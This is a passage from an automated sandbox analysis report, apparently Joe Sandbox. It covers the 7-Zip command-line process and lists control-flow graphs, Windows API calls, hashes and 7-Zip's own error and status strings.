2166 265acf-265b54 call 2647ac 2159->2166 2160->2159 2165 265ac5-265aca 2160->2165 2170 265955-26596d free 2161->2170 2162->2087 2181 265a13-265a15 2164->2181 2182 265a21-265a30 2164->2182 2165->2166 2183 265dfe-265e1a free 2166->2183 2184 265b5a-265b61 2166->2184 2168->2151 2185 265d80-265d9c free 2169->2185 2186 265a8c 2169->2186 2170->2162 2170->2170 2181->2182 2191 265a17-265a1d 2181->2191 2182->2164 2192 265a32-265a52 2182->2192 2187 265e1c 2183->2187 2188 265e3a-265e77 free call 264610 free * 2 2183->2188 2193 265b63-265b7e 2184->2193 2194 265b80 2184->2194 2195 265d9e 2185->2195 2196 265dbc-265df9 free call 264610 free * 2 2185->2196 2186->2151 2197 265e20-265e38 free 2187->2197 2188->2099 2189->2155 2190->2189 2199 265917-26591f 2190->2199 2191->2182 2192->2157 2200 265b88-265bb6 2193->2200 2194->2200 2201 265da2-265dba free 2195->2201 2196->2099 2197->2188 2197->2197 2199->2189 2204 265e7c-265e95 free 2200->2204 2205 265bbc-265bd6 free 2200->2205 2201->2196 2201->2201 2207 265e97 2204->2207 2208 265eb5-265ef4 free call 264610 free * 2 2204->2208 2209 265bff-265c12 free call 264610 2205->2209 2210 265bd8-265bdc 2205->2210 2215 265e9b-265eb3 free 2207->2215 2208->2099 2218 265c17-265c35 free 2209->2218 2211 265bde-265bf5 free 2210->2211 2211->2211 2217 265bf7 2211->2217 2215->2208 2215->2215 2217->2209 2218->2087
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrow$memset
                                                                                                                                        • String ID: can't decompress folder$there is no such archive
                                                                                                                                        • API String ID: 4182836161-2069749860
                                                                                                                                        • Opcode ID: 2e8de8ec95246ae197428a0f4b46b566b2038643631a74e7977ba0014a39102a
                                                                                                                                        • Instruction ID: 6a64d10f340e09b7a325eb67eae4e855199ec3117bbdff92601ba221327932f4
                                                                                                                                        • Opcode Fuzzy Hash: 2e8de8ec95246ae197428a0f4b46b566b2038643631a74e7977ba0014a39102a
                                                                                                                                        • Instruction Fuzzy Hash: C0524032229AD1C6CB24DF26E4843AEB764F786B94F445112EF9D53B25DF38C8A5CB40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 32ea17c43f2656eab24867a4277591ee53f988a9c8a634700e00343675cc7f60
                                                                                                                                        • Instruction ID: 2727465738a6f9ba44df2f2e18171664dfa82cf36308f49c79f85bb3d560016a
                                                                                                                                        • Opcode Fuzzy Hash: 32ea17c43f2656eab24867a4277591ee53f988a9c8a634700e00343675cc7f60
                                                                                                                                        • Instruction Fuzzy Hash: 49429237229AC0C6CB64DF26E1906AF77A5F786B88F555011EB4E43B16CF79C4A9CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • -ai switch is not supported for this command, xrefs: 002515C3
                                                                                                                                        • Incorrect Number of benmchmark iterations, xrefs: 00251847
                                                                                                                                        • Archive name cannot by empty, xrefs: 00251151
                                                                                                                                        • I won't write compressed data to a terminal, xrefs: 00251741
                                                                                                                                        • Only one archive can be created with rename command, xrefs: 002517E1
                                                                                                                                        • Cannot use absolute pathnames for this command, xrefs: 0025138C
                                                                                                                                        • stdout mode and email mode cannot be combined, xrefs: 00251710
                                                                                                                                        • Unsupported -spf:, xrefs: 00250F7E
                                                                                                                                        • Cannot find archive name, xrefs: 0025110A
                                                                                                                                        • I won't write data and program's messages to same stream, xrefs: 002514B3, 00251782
                                                                                                                                        • The command must be specified, xrefs: 00250DF5
                                                                                                                                        • Unsupported command:, xrefs: 00250E57
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrow$free$wcscmp
                                                                                                                                        • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                        • API String ID: 1252877886-1892825451
                                                                                                                                        • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                        • Instruction ID: 10386437ba1605c7ab0bced4fc014cc651cc7fca9f3ece5196aca7ff58a61bd9
                                                                                                                                        • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                        • Instruction Fuzzy Hash: C152E0773246C2A7DB28DF29D4943AEBB61F745784F888016DB9903A12DB78D5BCCB04
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID: SeSecurityPrivilege
                                                                                                                                        • API String ID: 1313864721-2333288578
                                                                                                                                        • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                        • Instruction ID: f8d9df9cde6c232823e47d50a6d64093585f62e3cc434200f5b789a02aba5648
                                                                                                                                        • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                        • Instruction Fuzzy Hash: C811637A216B44C2DA40CF12FA5836DB3B6FBC4B85F944412EA8F42A58CF7CC569CB10
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0024AC84
                                                                                                                                        • OpenProcessToken.ADVAPI32 ref: 0024AC95
                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32 ref: 0024ACA9
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0024F928), ref: 0024ACE0
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0024F928), ref: 0024ACEA
                                                                                                                                        • CloseHandle.KERNELBASE ref: 0024ACFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3398352648-0
                                                                                                                                        • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                        • Instruction ID: 11a67e65e929e87b26492997d5b874aefddb4c9b7cd20080a9093ec60d2179a9
                                                                                                                                        • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                        • Instruction Fuzzy Hash: 8501527761568187DB508FA4F98879A7361F784B85F649136EB4B83A58CF3CC499CB00
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0024794C: FindClose.KERNELBASE ref: 0024795E
                                                                                                                                        • FindFirstFileW.KERNELBASE ref: 002479BA
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                        • FindFirstFileW.KERNELBASE ref: 002479FA
                                                                                                                                        • free.MSVCRT ref: 00247A08
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2921071498-0
                                                                                                                                        • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                        • Instruction ID: 1babee1a99b0e4dcb060587c10d3bd044d2367650d2207bc2118f690d5f534e1
                                                                                                                                        • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                        • Instruction Fuzzy Hash: D8213C36218A8086DB25DF24E44035D6364F78ABB8F548320EABD477D9DF38CA19CB40
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: h&$Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                        • API String ID: 0-428840169
                                                                                                                                        • Opcode ID: 93a017d1596765492eb84318f4eb14f9a219988a9175275ef03531af29d7c757
                                                                                                                                        • Instruction ID: afc73773fd07d61d2b179b495a9a8633d4364ab9af829edd0c74efc26ebe58f2
                                                                                                                                        • Opcode Fuzzy Hash: 93a017d1596765492eb84318f4eb14f9a219988a9175275ef03531af29d7c757
                                                                                                                                        • Instruction Fuzzy Hash: 82037232268AC1C1CB34EF25E4542AEB761F7C5B85F944112EB9E47B25DF78C8A9CB04

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1016 28950d-289510 1017 289a40-289a8e call 242130 1016->1017 1018 289516-289529 call 24ed74 1016->1018 1028 289a90-289aa0 call 243314 1017->1028 1029 289aa2 1017->1029 1024 28952f-289537 1018->1024 1025 289820-289828 1018->1025 1030 289539-289541 1024->1030 1031 289557-2895d5 call 283230 call 243208 1024->1031 1026 28982e-28983f call 2878a8 1025->1026 1027 2899e4-2899ee 1025->1027 1045 28984c-28994d call 286990 call 242bc8 call 267880 call 242bc8 call 242cdc call 286c04 1026->1045 1046 289841-289845 1026->1046 1037 289a20-289a3f _CxxThrowException 1027->1037 1038 2899f0-289a1b call 242300 fputs * 2 call 242300 1027->1038 1035 289aa5-289ac8 call 24b8f0 call 242130 1028->1035 1029->1035 1030->1031 1034 289543-289552 call 243518 1030->1034 1056 2895e5 1031->1056 1057 2895d7-2895df 1031->1057 1034->1031 1061 289aca-289ada call 243314 1035->1061 1062 289adc 1035->1062 1037->1017 1038->1037 1097 28994f 1045->1097 1098 289980-2899df free * 5 call 286a20 1045->1098 1046->1045 1059 2895e8-289631 call 243404 call 28780c 1056->1059 1057->1056 1058 2895e1-2895e3 1057->1058 1058->1059 1078 28963e-28964d 1059->1078 1079 289633-289637 1059->1079 1065 289adf-289c8b call 24b8f0 call 242130 1061->1065 1062->1065 1090 289c9a 1065->1090 1091 289c8d-289c98 call 287414 1065->1091 1083 28964f-289657 1078->1083 1084 289663 1078->1084 1079->1078 1083->1084 1087 289659-289661 1083->1087 1088 28966b-28972c call 243404 call 286990 call 242bc8 1084->1088 1087->1088 1117 28972f call 2799b8 1088->1117 1095 289c9d-289ca8 1090->1095 1091->1095 1100 289caa-289cb3 1095->1100 1101 289cb4-289d77 call 243404 1095->1101 1105 289953-289969 1097->1105 1116 28a5ad-28a5b5 1098->1116 1100->1101 1114 289d79-289d7d 1101->1114 1115 289d83-289e8a call 2871ec call 243404 call 24ef70 call 243208 call 266be0 1101->1115 1110 28997b-28997e 1105->1110 1111 28996b-289976 free * 2 1105->1111 1110->1098 1110->1105 1111->1110 1114->1115 1159 289e8c-289eb4 call 266e08 1115->1159 1160 289ed2-289f44 call 265458 1115->1160 1119 28a5c5-28a5c8 1116->1119 1120 28a5b7-28a5be 1116->1120 1121 289734-28973f 1117->1121 1124 28a5ca-28a5e6 _CxxThrowException 1119->1124 1125 28a5e7-28a603 free 1119->1125 1120->1119 1123 28a5c0 1120->1123 1128 289750-289798 call 286c04 1121->1128 1129 289741-28974b call 28b1c8 1121->1129 1131 28a5c0 call 2866a8 1123->1131 1124->1125 1126 28a605 1125->1126 1127 28a626-28a637 free call 26a13c 1125->1127 1132 28a609-28a624 free 1126->1132 1137 28a63c-28a675 call 287080 call 24182c call 287f50 1127->1137 1141 28979a 1128->1141 1142 2897cb-28981b free * 3 call 286a20 free call 28b310 1128->1142 1129->1128 1131->1119 1132->1127 1132->1132 1164 28a6a8-28a6c9 free 1137->1164 1165 28a677 1137->1165 1145 28979e-2897b4 1141->1145 1142->1116 1150 2897c6-2897c9 1145->1150 1151 2897b6-2897c1 free * 2 1145->1151 1150->1142 1150->1145 1151->1150 1159->1160 1170 289eb6-289ed1 _CxxThrowException 1159->1170 1168 289f49-289f53 1160->1168 1169 28a67b-28a691 1165->1169 1171 289f60-289f68 1168->1171 1172 289f55-289f5b call 28b1c8 1168->1172 1173 28a6a3-28a6a6 1169->1173 1174 28a693-28a69e free * 2 1169->1174 1170->1160 1176 289f6a-289f74 1171->1176 1177 289fbd-289fca 1171->1177 1172->1171 1173->1164 1173->1169 1174->1173 1180 289fb1-289fb9 1176->1180 1181 289f76-289fac call 242300 fputs call 242300 call 242320 call 242300 1176->1181 1178 28a02c-28a033 1177->1178 1179 289fcc-289fcf call 242300 1177->1179 1182 28a063-28a06a 1178->1182 1183 28a035-28a03a 1178->1183 1189 289fd4-289fdc 1179->1189 1180->1177 1181->1180 1187 28a06c-28a071 1182->1187 1188 28a09e-28a0a1 1182->1188 1183->1182 1186 28a03c-28a05e fputs call 2426a0 call 242300 1183->1186 1186->1182 1192 28a114-28a11b 1187->1192 1193 28a077-28a099 fputs call 2426a0 call 242300 1187->1193 1188->1192 1195 28a0a3-28a0aa 1188->1195 1189->1178 1194 289fde-28a027 fputs call 2426a0 call 242300 fputs call 2426a0 call 242300 1189->1194 1201 28a15c-28a15f 1192->1201 1202 28a11d-28a122 1192->1202 1193->1188 1194->1178 1203 28a0ac-28a0ce fputs call 2426a0 call 242300 1195->1203 1204 28a0d3-28a0da 1195->1204 1208 28a16c-28a16f 1201->1208 1209 28a161 1201->1209 1202->1209 1213 28a124-28a133 call 242300 1202->1213 1203->1204 1204->1192 1207 28a0dc-28a0eb call 242300 1204->1207 1207->1192 1231 28a0ed-28a10f fputs call 2426a0 call 242300 1207->1231 1217 28a320-28a50a free * 2 call 266b58 free call 287968 1208->1217 1218 28a175-28a17c 1208->1218 1209->1208 1213->1209 1230 28a135-28a157 fputs call 2426a0 call 242300 1213->1230 1268 28a50c 1217->1268 1269 28a53d-28a559 free 1217->1269 1226 28a182-28a189 1218->1226 1227 28a2e7-28a2f6 call 242300 1218->1227 1226->1227 1233 28a18f-28a192 1226->1233 1227->1217 1243 28a2f8-28a31f fputs call 2426a0 call 242300 1227->1243 1230->1201 1231->1192 1233->1217 1240 28a198-28a1a3 1233->1240 1247 28a1d5-28a1de 1240->1247 1248 28a1a5-28a1cd fputs call 2426a0 call 242300 1240->1248 1243->1217 1249 28a1e0-28a1e3 1247->1249 1250 28a1f3-28a223 fputs call 2426a0 call 242300 1247->1250 1248->1247 1249->1250 1255 28a1e5-28a1ed 1249->1255 1260 28a275-28a2c3 fputs call 2426a0 call 242300 fputs call 2426a0 call 242300 1250->1260 1280 28a225-28a270 fputs call 2426a0 call 242300 fputs call 2426a0 call 242300 1250->1280 1255->1250 1255->1260 1291 28a2c8-28a2cb 1260->1291 1271 28a510-28a526 1268->1271 1273 28a55b 1269->1273 1274 28a58c-28a599 free 1269->1274 1276 28a538-28a53b 1271->1276 1277 28a528-28a533 free * 2 1271->1277 1279 28a55f-28a575 1273->1279 1274->1116 1276->1269 1276->1271 1277->1276 1282 28a587-28a58a 1279->1282 1283 28a577-28a582 free * 2 1279->1283 1280->1260 1282->1274 1282->1279 1283->1282 1291->1217 1293 28a2cd-28a2e5 call 242300 call 28291c 1291->1293 1293->1217
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                        • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                        • API String ID: 1639683984-435538426
                                                                                                                                        • Opcode ID: a5edce60f16c0a8758953ddf38f0e082bcd3476ac33733fa32864daedc8a44b4
                                                                                                                                        • Instruction ID: d2486410bd854a3c16b5023f8855a2ce5997541f3ff310e56aad782779588fe5
                                                                                                                                        • Opcode Fuzzy Hash: a5edce60f16c0a8758953ddf38f0e082bcd3476ac33733fa32864daedc8a44b4
                                                                                                                                        • Instruction Fuzzy Hash: DD729E3632AAC1D5DA34EF25E4943EEB3A0F785780F844126DA9D43B59DF38C5A9CB01

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1833 289b5d-289b5f 1834 289b79-289c1f call 28057c call 243208 call 2638e8 free 1833->1834 1835 289b61-289b74 fputs call 242300 1833->1835 1843 289c30-289c33 1834->1843 1844 289c21-289c2b call 28b1c8 1834->1844 1835->1834 1846 289c54-289c8b call 28b310 call 242130 1843->1846 1847 289c35-289c3c 1843->1847 1844->1843 1857 289c9a 1846->1857 1858 289c8d-289c98 call 287414 1846->1858 1847->1846 1848 289c3e-289c4e call 280994 1847->1848 1853 289c53 1848->1853 1853->1846 1860 289c9d-289ca8 1857->1860 1858->1860 1862 289caa-289cb3 1860->1862 1863 289cb4-289d77 call 243404 1860->1863 1862->1863 1867 289d79-289d7d 1863->1867 1868 289d83-289e8a call 2871ec call 243404 call 24ef70 call 243208 call 266be0 1863->1868 1867->1868 1879 289e8c-289eb4 call 266e08 1868->1879 1880 289ed2-289f53 call 265458 1868->1880 1879->1880 1885 289eb6-289ed1 _CxxThrowException 1879->1885 1886 289f60-289f68 1880->1886 1887 289f55-289f5b call 28b1c8 1880->1887 1885->1880 1889 289f6a-289f74 1886->1889 1890 289fbd-289fca 1886->1890 1887->1886 1893 289fb1-289fb9 1889->1893 1894 289f76-289fac call 242300 fputs call 242300 call 242320 call 242300 1889->1894 1891 28a02c-28a033 1890->1891 1892 289fcc-289fcf call 242300 1890->1892 1895 28a063-28a06a 1891->1895 1896 28a035-28a03a 1891->1896 1902 289fd4-289fdc 1892->1902 1893->1890 1894->1893 1900 28a06c-28a071 1895->1900 1901 28a09e-28a0a1 1895->1901 1896->1895 1899 28a03c-28a05e fputs call 2426a0 call 242300 1896->1899 1899->1895 1905 28a114-28a11b 1900->1905 1906 28a077-28a099 fputs call 2426a0 call 242300 1900->1906 1901->1905 1908 28a0a3-28a0aa 1901->1908 1902->1891 1907 289fde-28a027 fputs call 2426a0 call 242300 fputs call 2426a0 call 242300 1902->1907 1914 28a15c-28a15f 1905->1914 1915 28a11d-28a122 1905->1915 1906->1901 1907->1891 1916 28a0ac-28a0ce fputs call 2426a0 call 242300 1908->1916 1917 28a0d3-28a0da 1908->1917 1921 28a16c-28a16f 1914->1921 1922 28a161 1914->1922 1915->1922 1926 28a124-28a133 call 242300 1915->1926 1916->1917 1917->1905 1920 28a0dc-28a0eb call 242300 1917->1920 1920->1905 1944 28a0ed-28a10f fputs call 2426a0 call 242300 1920->1944 1930 28a320-28a50a free * 2 call 266b58 free call 287968 1921->1930 1931 28a175-28a17c 1921->1931 1922->1921 1926->1922 1943 28a135-28a157 fputs call 2426a0 call 242300 1926->1943 1981 28a50c 1930->1981 1982 28a53d-28a559 free 1930->1982 1939 28a182-28a189 1931->1939 1940 28a2e7-28a2f6 call 242300 1931->1940 1939->1940 1946 28a18f-28a192 1939->1946 1940->1930 1956 28a2f8-28a31f fputs call 2426a0 call 242300 1940->1956 1943->1914 1944->1905 1946->1930 1953 28a198-28a1a3 1946->1953 1960 28a1d5-28a1de 1953->1960 1961 28a1a5-28a1cd fputs call 2426a0 call 242300 1953->1961 1956->1930 1962 28a1e0-28a1e3 1960->1962 1963 28a1f3-28a223 fputs call 2426a0 call 242300 1960->1963 1961->1960 1962->1963 1968 28a1e5-28a1ed 1962->1968 1973 28a275-28a2c3 fputs call 2426a0 call 242300 fputs call 2426a0 call 242300 1963->1973 1993 28a225-28a270 fputs call 2426a0 call 242300 fputs call 2426a0 call 242300 1963->1993 1968->1963 1968->1973 2016 28a2c8-28a2cb 1973->2016 1984 28a510-28a526 1981->1984 1986 28a55b 1982->1986 1987 28a58c-28a5b5 free 1982->1987 1989 28a538-28a53b 1984->1989 1990 28a528-28a533 free * 2 1984->1990 1992 28a55f-28a575 1986->1992 1999 28a5c5-28a5c8 1987->1999 2000 28a5b7-28a5be 1987->2000 1989->1982 1989->1984 1990->1989 1996 28a587-28a58a 1992->1996 1997 28a577-28a582 free * 2 1992->1997 1993->1973 1996->1987 1996->1992 1997->1996 2004 28a5ca-28a5e6 _CxxThrowException 1999->2004 2005 28a5e7-28a603 free 1999->2005 2000->1999 2003 28a5c0 call 2866a8 2000->2003 2003->1999 2004->2005 2006 28a605 2005->2006 2007 28a626-28a637 free call 26a13c 2005->2007 2011 28a609-28a624 free 2006->2011 2015 28a63c-28a675 call 287080 call 24182c call 287f50 2007->2015 2011->2007 2011->2011 2031 28a6a8-28a6c9 free 2015->2031 2032 28a677 2015->2032 2016->1930 2019 28a2cd-28a2e5 call 242300 call 28291c 2016->2019 2019->1930 2034 28a67b-28a691 2032->2034 2035 28a6a3-28a6a6 2034->2035 2036 28a693-28a69e free * 2 2034->2036 2035->2031 2035->2034 2036->2035
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputcfputsfree
                                                                                                                                        • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                        • API String ID: 2822829076-727241755
                                                                                                                                        • Opcode ID: 93e2898d9996af893ae28e387e6fa8a3083807d3a00d52c34ec306b6434381bf
                                                                                                                                        • Instruction ID: e248fcf871da00b8b2fa2a20f0eb93291a3b241fe70b8dc3f0531e4986c7a333
                                                                                                                                        • Opcode Fuzzy Hash: 93e2898d9996af893ae28e387e6fa8a3083807d3a00d52c34ec306b6434381bf
                                                                                                                                        • Instruction Fuzzy Hash: 19223F3632AAC1D1DA34EF25E4943DEB3A0F785B80F844126DA9D43B59DF38C5A9CB01

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
